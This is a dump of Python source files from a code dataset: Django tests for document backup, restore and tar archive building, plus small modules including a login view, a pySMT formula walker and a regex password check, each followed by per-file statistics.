len(backup_info.get('documents')), 1,
'backup.json key documents had more or less than one entry'
)
self.assertIs(
len(backup_file.getnames()),
2,
'backup.tar had more or less than 2 entries'
)
self.assertTrue(
f"berlin.pdf__{doc.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar'
)
def test_backup_document_hierachy(self):
folder_1 = Folder.objects.create(
title='1',
parent=None,
user=self.testcase_user
)
folder_2 = Folder.objects.create(
title='2',
parent=folder_1,
user=self.testcase_user
)
folder_3 = Folder.objects.create(
title='3',
parent=folder_1,
user=self.testcase_user
)
Folder.objects.create(
title='4',
parent=None,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=folder_2.id,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_1.path.url(),
)
doc_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=folder_3.id,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_2.path.url(),
)
with io.BytesIO() as memoryfile:
backup_documents(memoryfile, self.testcase_user)
memoryfile.seek(0)
self.assertTrue(
_can_restore(memoryfile),
'generated backup.tar is not valid'
)
memoryfile.seek(0)
backup_file = tarfile.open(fileobj=memoryfile, mode='r')
backup_json = backup_file.extractfile('backup.json')
backup_info = json.loads(backup_json.read())
self.assertIsNotNone(
backup_info.get('documents'),
'backup.json did not have a key "documents"'
)
self.assertIs(
len(backup_info.get('documents')), 2,
'backup.json key documents had more or less than two entry'
)
self.assertIs(
len(backup_file.getnames()),
3,
'backup.tar had more or less than 2 entries'
)
self.assertTrue(
f"1/2/berlin.pdf__{doc_1.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar at folder 1/2/'
)
self.assertTrue(
f"1/3/berlin.pdf__{doc_2.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar at folder 1/3/'
)
self.assertFalse(
'4' in backup_file.getnames(),
'Folder 4 was in backup.tar but should have been ignored'
)
def test_restore_backup(self):
restore_path = os.path.join(
BASE_DIR, "data", "testdata.tar"
)
with open(restore_path, 'rb') as restore_archive:
restore_documents(restore_archive, self.testcase_user)
folder_1 = Folder.objects.filter(title='1', parent=None).first()
self.assertIsNotNone(folder_1, 'Folder "1" was not restored')
folder_2 = Folder.objects.filter(title='2', parent=None).first()
self.assertIsNotNone(folder_2, 'Folder "2" was not restored')
folder_3 = Folder.objects.filter(title='3', parent=folder_2).first()
self.assertIsNotNone(folder_3, 'Folder "3" was not restored')
document_berlin_1 = Document.objects.filter(
title='berlin.pdf',
parent=folder_1
).first()
self.assertIsNotNone(
document_berlin_1,
'Document "berlin.pdf" in folder 1 was not restored'
)
document_berlin_3 = Document.objects.filter(
title='berlin.pdf',
parent=folder_3
).first()
self.assertIsNotNone(
document_berlin_3,
'Document "berlin.pdf" in folder 3 was not restored'
)
def test_restore_backup_documents_in_root(self):
"""
In case tar file contain documents in root (i.e. documents not
part any folder) - restore_documents function should not throw
an error (e.g. AttributeError: 'NoneType' object has no attribute 'id')
"""
restore_path = os.path.join(
BASE_DIR, "data", "one-doc-in-root-testdata.tar"
)
with open(restore_path, 'rb') as restore_archive:
# should not throw an exception
restore_documents(restore_archive, self.testcase_user)
class TestBuildTarArchive(TestCase):
"""
Test functionality which builds downloaded tar archive with
selected nodes (documents and folders)
"""
def setUp(self):
self.testcase_user = create_root_user()
def test_basic(self):
"""
Creates following hierarchy:
+ Accounting
+ Expenses
+ berlin_ex_1.pdf
+ berlin_ex_2.pdf
+ berlin_root_1.pdf
+ berlin_root_2.pdf
"""
acc = Folder.objects.create(
title='Accounting',
parent=None,
user=self.testcase_user
)
ex = Folder.objects.create(
title='Expenses',
parent=acc,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_in_root_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_1.path.url(),
)
doc_in_root_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_2.path.url(),
)
doc_in_ex_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_ex_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=ex.id,
file_name='berlin_ex_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_ex_1.path.url(),
)
doc_in_ex_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_ex_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=ex.id,
file_name='berlin_ex_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_ex_2.path.url(),
)
"""
User selected two documents in the root dir berlin_root_1.pdf,
and berlin_root_1.pdf and the Accounting folder.
Selection is marked with square brackets [...]
+ [Accounting]
+ Expenses
+ berlin_ex_1.pdf
+ berlin_ex_2.pdf
+ [berlin_root_1.pdf]
+ [berlin_root_2.pdf]
"""
selected_ids = [
doc_in_root_1.id, doc_in_root_2.id, acc.id
]
with io.BytesIO() as memoryfile:
build_tar_archive( # <-- THIS IS WHAT WE ARE TESTING
fileobj=memoryfile,
node_ids=selected_ids
)
memoryfile.seek(0)
archive_file = tarfile.open(fileobj=memoryfile, mode='r')
berlin_root_1_handle = archive_file.extractfile(
'berlin_root_1.pdf'
)
data = berlin_root_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_ex_1_handle = archive_file.extractfile(
'Accounting/Expenses/berlin_ex_1.pdf'
)
data = berlin_ex_1_handle.read()
self.assertTrue(len(data) > 0)
with self.assertRaises(KeyError):
# there is no file Accounting/Expenses/Paris.pdf
# in archive, thus, KeyError exception is expected
archive_file.extractfile(
'Accounting/Expenses/Paris.pdf'
)
def test_basic_two_folders(self):
"""
Creates following hierarchy:
+ Folder_1
+ berlin_f_1.pdf
+ Folder_2
+ berlin_f_2.pdf
+ berlin_root_1.pdf
+ berlin_root_2.pdf
"""
f1 = Folder.objects.create(
title='Folder_1',
parent=None,
user=self.testcase_user
)
f2 = Folder.objects.create(
title='Folder_2',
parent=None,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_in_root_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_1.path.url(),
)
doc_in_root_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_2.path.url(),
)
doc_in_f_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_f_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=f1.id,
file_name='berlin_f_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_f_1.path.url(),
)
doc_in_f_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_f_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=f2.id,
file_name='berlin_f_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_f_2.path.url(),
)
"""
User selected two documents in the root dir berlin_root_1.pdf,
and berlin_root_1.pdf plus Folder_1 and Folder_2.
Selection is marked with square brackets [...]
+ [Folder_1]
+ berlin_f_1.pdf
+ [Folder_2]
+ berlin_f_2.pdf
+ [berlin_root_1.pdf]
+ [berlin_root_2.pdf]
"""
selected_ids = [
doc_in_root_1.id, doc_in_root_2.id, f1.id, f2.id
]
with io.BytesIO() as memoryfile:
build_tar_archive( # <-- THIS IS WHAT WE ARE TESTING
fileobj=memoryfile,
node_ids=selected_ids
)
memoryfile.seek(0)
archive_file = tarfile.open(fileobj=memoryfile, mode='r')
berlin_root_1_handle = archive_file.extractfile(
'berlin_root_1.pdf'
)
data = berlin_root_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_f_1_handle = archive_file.extractfile(
'Folder_1/berlin_f_1.pdf'
)
data = berlin_f_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_f_2_handle = archive_file.extractfile(
'Folder_2/berlin_f_2.pdf'
)
data = berlin_f_2_handle.read()
self.assertTrue(len(data) > 0)
with self.assertRaises(KeyError):
# there is no file Accounting/Expenses/Paris.pdf
# in archive, thus, KeyError exception is expected
archive_file.extractfile(
'Accounting/Expenses/Paris.pdf'
)
| 31.161157
| 79
| 0.544358
| 1,698
| 15,082
| 4.58245
| 0.102474
| 0.040098
| 0.051407
| 0.048837
| 0.800925
| 0.743478
| 0.711862
| 0.682303
| 0.642334
| 0.632309
| 0
| 0.016965
| 0.362949
| 15,082
| 483
| 80
| 31.225673
| 0.792881
| 0.062392
| 0
| 0.529891
| 0
| 0
| 0.117307
| 0.016639
| 0
| 0
| 0
| 0
| 0.065217
| 1
| 0.021739
| false
| 0
| 0.027174
| 0
| 0.054348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
460fd43bfbfd4f52f9b71e97d4290002eeb67f97
| 125
|
py
|
Python
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_on_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 3
|
2020-11-03T23:49:28.000Z
|
2020-11-13T07:25:33.000Z
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_on_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 7
|
2021-04-06T18:19:48.000Z
|
2021-09-22T19:43:54.000Z
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_without_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 1
|
2021-01-26T19:45:37.000Z
|
2021-01-26T19:45:37.000Z
|
from django.contrib.auth.views import LoginView
class SignInView(LoginView):
template_name = "onboarding/sign-in.html"
| 20.833333
| 47
| 0.784
| 16
| 125
| 6.0625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 125
| 5
| 48
| 25
| 0.881818
| 0
| 0
| 0
| 0
| 0
| 0.184
| 0.184
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
1cec4fe2ac0c0e6d7d8cf6f0b85321ba03baa3da
| 97
|
py
|
Python
|
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 1
|
2020-06-25T02:17:26.000Z
|
2020-06-25T02:17:26.000Z
|
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | null | null | null |
from os import PathLike
def baz(akjlkgjdfsakglkd: PathLike) -> None:
pass
baz("foobar.txt")
| 16.166667
| 44
| 0.721649
| 13
| 97
| 5.384615
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164948
| 97
| 6
| 45
| 16.166667
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
e816ee7e44f58de4823a25599b2d059b85af79bb
| 78
|
py
|
Python
|
test.py
|
tchristiansen-aquaveo/xmsgrid
|
800d6e759e5c95a0dff54258a5229691d4f27904
|
[
"BSD-2-Clause"
] | 2
|
2018-08-10T16:38:23.000Z
|
2019-04-26T15:06:03.000Z
|
test.py
|
tchristiansen-aquaveo/xmsgrid
|
800d6e759e5c95a0dff54258a5229691d4f27904
|
[
"BSD-2-Clause"
] | 24
|
2018-08-27T23:06:51.000Z
|
2019-05-23T14:57:14.000Z
|
test.py
|
Aquaveo/xmsstamper
|
00abfec145f9dab1867006ccdffe6e9e1a0e4caf
|
[
"BSD-2-Clause"
] | 2
|
2019-05-22T23:53:01.000Z
|
2021-04-14T21:04:55.000Z
|
# Run tests
if __name__ == '__main__':
print('Running all the tests...')
| 15.6
| 37
| 0.628205
| 10
| 78
| 4.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 78
| 4
| 38
| 19.5
| 0.66129
| 0.115385
| 0
| 0
| 0
| 0
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 4
|
e8272542c96e6f91c1ffa6d45a735ed95377080d
| 130
|
py
|
Python
|
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
# This file is executed on every boot (including wake-boot from deepsleep)
import gc
import webrepl
gc.collect()
webrepl.start()
| 18.571429
| 74
| 0.776923
| 20
| 130
| 5.05
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 6
| 75
| 21.666667
| 0.90991
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c061ca31269cc15f5adac8170952f3062131286
| 563
|
py
|
Python
|
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | 7
|
2021-10-11T12:07:08.000Z
|
2022-01-10T01:19:36.000Z
|
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | null | null | null |
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class Tool(ABC):
@abstractmethod
def __init__(self):
pass
@abstractmethod
def parse(self, str):
pass
@property
def image(self):
raise NotImplementedError
@property
def command(self):
raise NotImplementedError
@property
def lang_supported(self):
raise NotImplementedError
def __eq__(self, other):
if type(other) is type(self) and other.image is self.image:
return self.__dict__ == other.__dict__
return False
| 19.413793
| 67
| 0.632327
| 61
| 563
| 5.557377
| 0.459016
| 0.097345
| 0.247788
| 0.212389
| 0.230089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.296625
| 563
| 28
| 68
| 20.107143
| 0.856061
| 0
| 0
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.095238
| 0.047619
| 0
| 0.47619
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
1c08cc0040eea5fc3052bc9eb0868d9aa3025f30
| 292
|
py
|
Python
|
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
"""A collection of common stream operations."""
from ._buffers import Window, Group, Delay
from ._combiners import Chain, Merge, Zip, ZipLatest
from ._filters import Skip, SkipWhile, Filter, Changes, RateLimit
from ._producers import Repeat, Metronome, InsertValue
from ._refiners import Map
| 41.714286
| 65
| 0.794521
| 37
| 292
| 6.135135
| 0.783784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126712
| 292
| 6
| 66
| 48.666667
| 0.890196
| 0.140411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
1c2aaf1aee3aba725a49dd8b76f6a7262676634f
| 9,461
|
py
|
Python
|
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | null | null | null |
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | null | null | null |
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | 1
|
2019-11-13T00:36:59.000Z
|
2019-11-13T00:36:59.000Z
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pysmt.walkers.dag import DagWalker
class IdentityDagWalker(DagWalker):
"""This class traverses a formula and rebuilds it recursively
identically.
This could be useful when only some nodes needs to be rewritten
but the structure of the formula has to be kept.
"""
def __init__(self, env=None, invalidate_memoization=None):
DagWalker.__init__(self,
env=env,
invalidate_memoization=invalidate_memoization)
self.mgr = self.env.formula_manager
def walk_symbol(self, formula, args, **kwargs):
return self.mgr.Symbol(formula.symbol_name(),
formula.symbol_type())
def walk_real_constant(self, formula, args, **kwargs):
return self.mgr.Real(formula.constant_value())
def walk_int_constant(self, formula, args, **kwargs):
return self.mgr.Int(formula.constant_value())
def walk_bool_constant(self, formula, args, **kwargs):
return self.mgr.Bool(formula.constant_value())
def walk_str_constant(self, formula, **kwargs):
return self.mgr.String(formula.constant_value())
def walk_and(self, formula, args, **kwargs):
return self.mgr.And(args)
def walk_or(self, formula, args, **kwargs):
return self.mgr.Or(args)
def walk_not(self, formula, args, **kwargs):
return self.mgr.Not(args[0])
def walk_iff(self, formula, args, **kwargs):
return self.mgr.Iff(args[0], args[1])
def walk_implies(self, formula, args, **kwargs):
return self.mgr.Implies(args[0], args[1])
def walk_equals(self, formula, args, **kwargs):
return self.mgr.Equals(args[0], args[1])
def walk_ite(self, formula, args, **kwargs):
return self.mgr.Ite(args[0], args[1], args[2])
def walk_le(self, formula, args, **kwargs):
return self.mgr.LE(args[0], args[1])
def walk_lt(self, formula, args, **kwargs):
return self.mgr.LT(args[0], args[1])
def walk_forall(self, formula, args, **kwargs):
qvars = [self.walk_symbol(v, args, **kwargs)
for v in formula.quantifier_vars()]
return self.mgr.ForAll(qvars, args[0])
def walk_exists(self, formula, args, **kwargs):
qvars = [self.walk_symbol(v, args, **kwargs)
for v in formula.quantifier_vars()]
return self.mgr.Exists(qvars, args[0])
def walk_plus(self, formula, args, **kwargs):
return self.mgr.Plus(args)
def walk_times(self, formula, args, **kwargs):
return self.mgr.Times(args)
def walk_pow(self, formula, args, **kwargs):
return self.mgr.Pow(args[0], args[1])
def walk_minus(self, formula, args, **kwargs):
return self.mgr.Minus(args[0], args[1])
def walk_function(self, formula, args, **kwargs):
# We re-create the symbol name
old_name = formula.function_name()
new_name = self.walk_symbol(old_name, args, **kwargs)
return self.mgr.Function(new_name, args)
def walk_toreal(self, formula, args, **kwargs):
return self.mgr.ToReal(args[0])
# Begin fixed point
def walk_fixed_constant(self, formula, **kwargs):
return self.mgr.Fixed(formula.constant_value(), formula.fixed_int_width(),
formula.fixed_man_width())
def walk_fixed_lt(self, formula, args, **kwargs):
return self.mgr.FixedLT(args[0], args[1])
def walk_fixed_le(self, formula, args, **kwargs):
return self.mgr.FixedLE(args[0], args[1])
def walk_fixed_neg(self, formula, args, **kwargs):
return self.mgr.FixedNeg(args[0])
def walk_fixed_add(self, formula, args, **kwargs):
return self.mgr.FixedAdd(args[0], args[1])
def walk_fixed_sub(self, formula, args, **kwargs):
return self.mgr.FixedSub(args[0], args[1])
def walk_fixed_mul(self, formula, args, **kwargs):
return self.mgr.FixedMul(args[0], args[1])
# End fixed point
def walk_bv_constant(self, formula, **kwargs):
return self.mgr.BV(formula.constant_value(), formula.bv_width())
def walk_bv_and(self, formula, args, **kwargs):
return self.mgr.BVAnd(args[0], args[1])
def walk_bv_not(self, formula, args, **kwargs):
return self.mgr.BVNot(args[0])
def walk_bv_neg(self, formula, args, **kwargs):
return self.mgr.BVNeg(args[0])
def walk_bv_or(self, formula, args, **kwargs):
return self.mgr.BVOr(args[0], args[1])
def walk_bv_xor(self, formula, args, **kwargs):
return self.mgr.BVXor(args[0], args[1])
def walk_bv_add(self, formula, args, **kwargs):
return self.mgr.BVAdd(args[0], args[1])
def walk_bv_sub(self, formula, args, **kwargs):
return self.mgr.BVSub(args[0], args[1])
def walk_bv_mul(self, formula, args, **kwargs):
return self.mgr.BVMul(args[0], args[1])
def walk_bv_udiv(self, formula, args, **kwargs):
return self.mgr.BVUDiv(args[0], args[1])
def walk_bv_urem(self, formula, args, **kwargs):
return self.mgr.BVURem(args[0], args[1])
def walk_bv_ult(self, formula, args, **kwargs):
return self.mgr.BVULT(args[0], args[1])
def walk_bv_ule(self, formula, args, **kwargs):
return self.mgr.BVULE(args[0], args[1])
def walk_bv_extract(self, formula, args, **kwargs):
return self.mgr.BVExtract(args[0],
start=formula.bv_extract_start(),
end=formula.bv_extract_end())
def walk_bv_ror(self, formula, args, **kwargs):
return self.mgr.BVRor(args[0], formula.bv_rotation_step())
def walk_bv_rol(self, formula, args, **kwargs):
return self.mgr.BVRol(args[0], formula.bv_rotation_step())
def walk_bv_sext(self, formula, args, **kwargs):
return self.mgr.BVSExt(args[0], formula.bv_extend_step())
def walk_bv_zext(self, formula, args, **kwargs):
return self.mgr.BVZExt(args[0], formula.bv_extend_step())
def walk_bv_concat(self, formula, args, **kwargs):
return self.mgr.BVConcat(args[0], args[1])
def walk_bv_lshl(self, formula, args, **kwargs):
return self.mgr.BVLShl(args[0], args[1])
def walk_bv_lshr(self, formula, args, **kwargs):
return self.mgr.BVLShr(args[0], args[1])
def walk_bv_ashr(self, formula, args, **kwargs):
return self.mgr.BVAShr(args[0], args[1])
def walk_bv_comp(self, formula, args, **kwargs):
return self.mgr.BVComp(args[0], args[1])
def walk_bv_slt(self, formula, args, **kwargs):
return self.mgr.BVSLT(args[0], args[1])
def walk_bv_sle(self, formula, args, **kwargs):
return self.mgr.BVSLE(args[0], args[1])
def walk_bv_sdiv(self, formula, args, **kwargs):
return self.mgr.BVSDiv(args[0], args[1])
def walk_bv_srem(self, formula, args, **kwargs):
return self.mgr.BVSRem(args[0], args[1])
def walk_str_length(self, formula, args, **kwargs):
return self.mgr.StrLength(args[0])
def walk_str_concat(self, formula, args, **kwargs):
return self.mgr.StrConcat(args)
def walk_str_contains(self, formula, args, **kwargs):
return self.mgr.StrContains(args[0], args[1])
def walk_str_indexof(self, formula, args, **kwargs):
return self.mgr.StrIndexOf(args[0], args[1], args[2])
def walk_str_replace(self, formula, args, **kwargs):
return self.mgr.StrReplace(args[0], args[1], args[2])
def walk_str_substr(self, formula, args, **kwargs):
return self.mgr.StrSubstr(args[0], args[1], args[2])
def walk_str_prefixof(self, formula, args, **kwargs):
return self.mgr.StrPrefixOf(args[0], args[1])
def walk_str_suffixof(self, formula, args, **kwargs):
return self.mgr.StrSuffixOf(args[0], args[1])
def walk_str_to_int(self, formula, args, **kwargs):
return self.mgr.StrToInt(args[0])
def walk_int_to_str(self, formula, args, **kwargs):
return self.mgr.IntToStr(args[0])
def walk_str_charat(self, formula, args, **kwargs):
return self.mgr.StrCharAt(args[0], args[1])
def walk_bv_tonatural(self, formula, args, **kwargs):
return self.mgr.BVToNatural(args[0])
def walk_array_select(self, formula, args, **kwargs):
return self.mgr.Select(args[0], args[1])
def walk_array_store(self, formula, args, **kwargs):
return self.mgr.Store(args[0], args[1], args[2])
def walk_array_value(self, formula, args, **kwargs):
assign = dict(zip(args[1::2], args[2::2]))
return self.mgr.Array(formula.array_value_index_type(),
args[0],
assign)
def walk_div(self, formula, args, **kwargs):
return self.mgr.Div(args[0], args[1])
| 35.302239
| 82
| 0.640524
| 1,357
| 9,461
| 4.335298
| 0.173176
| 0.08686
| 0.159103
| 0.246303
| 0.63454
| 0.596634
| 0.573517
| 0.221486
| 0.066803
| 0.030937
| 0
| 0.015989
| 0.219956
| 9,461
| 267
| 83
| 35.434457
| 0.781165
| 0.091428
| 0
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.445122
| false
| 0
| 0.006098
| 0.414634
| 0.896341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
1c5fc3224b4e30fdb69bfccacfab4abbecd78298
| 168
|
py
|
Python
|
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Topics/Regexps in programs/Password validation/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
import re
password = input()
# your code here
pattern = r'^[\w]{6,15}$'
match = re.match(pattern, password, flags=re.ASCII)
print("Thank you!" if match else "Error!")
| 21
| 51
| 0.672619
| 27
| 168
| 4.185185
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 0.142857
| 168
| 7
| 52
| 24
| 0.763889
| 0.083333
| 0
| 0
| 0
| 0
| 0.184211
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| false
| 0.4
| 0.2
| 0
| 0.2
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
